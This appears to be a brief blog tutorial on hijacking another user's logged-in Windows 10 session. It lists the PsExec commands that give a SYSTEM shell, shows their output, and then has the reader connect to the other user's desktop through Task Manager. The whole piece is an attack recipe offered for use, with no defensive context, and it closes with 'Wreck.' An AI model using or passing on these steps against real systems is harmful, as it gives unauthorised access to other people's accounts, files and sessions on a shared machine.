How to Hijack Windows 10 Session?

Description

Purpose: To hijack a local windows session (any user)
Requirements: Local administrator rights
Tools: PsExec

Even with administrator rights, you can not impersonate (or hijack) a another user. With this attack you gain full control over a locally logged user account.

Instructions

Download SysInternal’s PsExec tool from here. Extract it to a folder of your choice and launch the elevated command prompt:

> cd C:\SysinternalsSuite
> PsExec.exe -i -s cmd.exe
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com

Change to a newly launched command prompt:

> whoami
nt authority\system
> taskmgr

Select the logged in user in the Task Manager and connect to the user’s desktop.

Wreck.

Leave a Reply

Your email address will not be published. Required fields are marked *